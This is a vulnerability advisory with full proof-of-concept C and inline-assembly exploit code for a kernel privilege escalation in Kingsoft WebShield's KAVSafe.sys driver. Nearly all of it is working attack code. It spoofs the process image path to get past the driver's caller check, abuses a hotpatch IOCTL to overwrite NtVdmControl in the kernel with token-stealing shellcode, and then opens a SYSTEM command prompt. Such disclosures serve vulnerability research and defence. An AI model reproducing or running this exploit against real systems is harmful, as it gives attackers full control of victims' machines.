Kingsoft WebShield KAVSafe.sys Privilege Escalation

`  
  
  
  
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability  
  
VULNERABLE PRODUCTS   
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)  
  
Signature Date: 2010-5-23 2:33:54  
  
And  
  
KAVSafe.sys <= 2010.4.14.609  
Signature Date：2010-4-14 13:42:26  
  
DETAILS:  
Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data  
  
EXPLOIT CODE:  
  
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)  
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(  
HANDLE ProcessHandle,  
DWORD ProcessInformationClass,  
PVOID ProcessInformation,  
ULONG ProcessInformationLength,  
PULONG ReturnLength  
);  
  
typedef struct _STRING {  
USHORT Length;  
USHORT MaximumLength;  
PCHAR Buffer;  
} STRING;  
typedef STRING *PSTRING;  
typedef struct _RTL_DRIVE_LETTER_CURDIR {  
USHORT Flags;  
USHORT Length;  
ULONG TimeStamp;  
STRING DosPath;  
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;  
typedef struct _UNICODE_STRING {  
USHORT Length;  
USHORT MaximumLength;  
PWSTR Buffer;  
} UNICODE_STRING;  
typedef UNICODE_STRING *PUNICODE_STRING;  
typedef const UNICODE_STRING *PCUNICODE_STRING;  
#define RTL_MAX_DRIVE_LETTERS 32  
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001  
typedef struct _CURDIR {  
UNICODE_STRING DosPath;  
HANDLE Handle;  
} CURDIR, *PCURDIR;  
typedef struct _RTL_USER_PROCESS_PARAMETERS {  
ULONG MaximumLength;  
ULONG Length;  
ULONG Flags;  
ULONG DebugFlags;  
HANDLE ConsoleHandle;  
ULONG ConsoleFlags;  
HANDLE StandardInput;  
HANDLE StandardOutput;  
HANDLE StandardError;  
CURDIR CurrentDirectory; // ProcessParameters  
UNICODE_STRING DllPath; // ProcessParameters  
UNICODE_STRING ImagePathName; // ProcessParameters  
UNICODE_STRING CommandLine; // ProcessParameters  
PVOID Environment; // NtAllocateVirtualMemory  
ULONG StartingX;  
ULONG StartingY;  
ULONG CountX;  
ULONG CountY;  
ULONG CountCharsX;  
ULONG CountCharsY;  
ULONG FillAttribute;  
ULONG WindowFlags;  
ULONG ShowWindowFlags;  
UNICODE_STRING WindowTitle; // ProcessParameters  
UNICODE_STRING DesktopInfo; // ProcessParameters  
UNICODE_STRING ShellInfo; // ProcessParameters  
UNICODE_STRING RuntimeData; // ProcessParameters  
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];  
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;  
typedef struct _PEB {  
BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the  
BOOLEAN ReadImageFileExecOptions; //  
BOOLEAN BeingDebugged; //  
BOOLEAN SpareBool; //  
HANDLE Mutant; // INITIAL_PEB structure is also updated.  
PVOID ImageBaseAddress;  
PVOID Ldr;  
struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;  
} PEB, *PPEB;  
typedef LONG KPRIORITY;  
typedef struct _PROCESS_BASIC_INFORMATION {  
LONG ExitStatus;  
PVOID PebBaseAddress;  
ULONG_PTR AffinityMask;  
KPRIORITY BasePriority;  
ULONG_PTR UniqueProcessId;  
ULONG_PTR InheritedFromUniqueProcessId;  
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;  
typedef struct {  
ULONG Unknown1;  
ULONG Unknown2;  
PVOID Base;  
ULONG Size;  
ULONG Flags;  
USHORT Index;  
USHORT NameLength;  
USHORT LoadCount;  
USHORT PathLength;  
CHAR ImageName[256];  
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;  
  
typedef struct {  
ULONG Count;  
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];  
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;  
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (  
LONG SystemInformationClass,  
PVOID SystemInformation,  
ULONG SystemInformationLength,  
PULONG ReturnLength  
);  
  
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )  
typedef LONG (WINAPI *PNT_VDM_CONTROL) (  
ULONG Service,  
PVOID ServiceData  
);  
VOID __declspec(naked) R0ShellCodeXP()  
{  
__asm  
{  
mov eax,0xffdff124  
mov eax,[eax]  
mov esi ,dword ptr[eax+0x220]  
mov eax,esi  
searchxp:  
mov eax,dword ptr[eax+0x88]  
sub eax,0x88  
mov edx,dword ptr[eax+0x84]  
cmp edx,4  
jnz searchxp  
mov eax,dword ptr[eax+0xc8]  
mov dword ptr[esi + 0xc8] , eax  
ret 8   
}  
}  
VOID NopNop()  
{  
printf("nop!\n");  
}  
  
#include "malloc.h"  
int main(int argc, char* argv[])  
{  
  
printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"  
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"  
"2010-5-23\n"  
"By Lincoin \n\nPress Enter");  
HKEY hkey ;   
WCHAR InstallPath[MAX_PATH];  
DWORD datatype ;   
DWORD datasize = MAX_PATH * sizeof(WCHAR);  
ULONG oldlen ;  
PVOID pOldBufferData = NULL ;   
  
if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)  
{  
if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)  
{  
RegCloseKey(hkey);  
printf("KSWebShield not installed\n");  
getchar();  
return 0 ;  
}  
  
RegCloseKey(hkey);  
}  
else  
{  
printf("KSWebShield not installed\n");  
getchar();  
return 0 ;  
}  
wcscat(InstallPath , L"\\kavinst.exe");  
  
  
PROCESS_BASIC_INFORMATION pbi ;   
  
PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;  
pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");  
pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);  
  
PPEB peb ;   
  
peb = (PPEB)pbi.PebBaseAddress;  
oldlen = peb->ProcessParameters->ImagePathName.Length;  
peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);  
pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);  
RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);  
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );  
HANDLE hdev = CreateFile("\\\\.\\KAVSafe" ,   
FILE_READ_ATTRIBUTES ,   
FILE_SHARE_READ ,   
0,  
OPEN_EXISTING ,   
0,  
0);  
  
if (hdev==INVALID_HANDLE_VALUE)  
{  
printf("cannot open device %u\n", GetLastError());  
getchar();  
return 0 ;   
}  
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);  
peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;   
  
PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation ;  
pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");  
X_SYSTEM_MODULE_INFORMATION sysmod ;   
HMODULE KernelHandle ;   
  
pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);  
KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);  
if (KernelHandle == 0 )  
{  
printf("cannot load ntoskrnl!\n");  
getchar();  
return 0 ;   
}  
PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");  
  
if (pNtVdmControl == 0 )  
{  
printf("cannot find NtVdmControl!\n");  
getchar();  
return 0 ;   
}  
pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle );  
  
printf("NtVdmControl = %08x" , pNtVdmControl );  
getchar();  
ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;  
ULONG pShellCode = (ULONG)R0ShellCodeXP;   
  
  
PVOID Data = malloc(0x48 + ShellCodeSize);  
  
CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);  
CHAR ModuleName[68]= "ntoskrnl.exe" ;   
RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));  
*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;  
*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;  
ULONG btr ;   
if (!DeviceIoControl(hdev ,  
IOCTL_HOTPATCH_KERNEL_MODULE ,   
Data ,   
0x48 + ShellCodeSize ,   
NULL ,   
0,  
&btr , 0   
))  
{  
printf("cannot device io control!%u\n" , GetLastError());  
getchar();  
return 0;  
}  
  
CloseHandle(hdev);  
  
PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");  
pR3NtVdmControl(0,0);  
WinExec("cmd.exe" , SW_SHOW);  
printf("OK!\n ");  
  
getchar();  
  
return 0;   
}  
  
  
  
  
  
  
`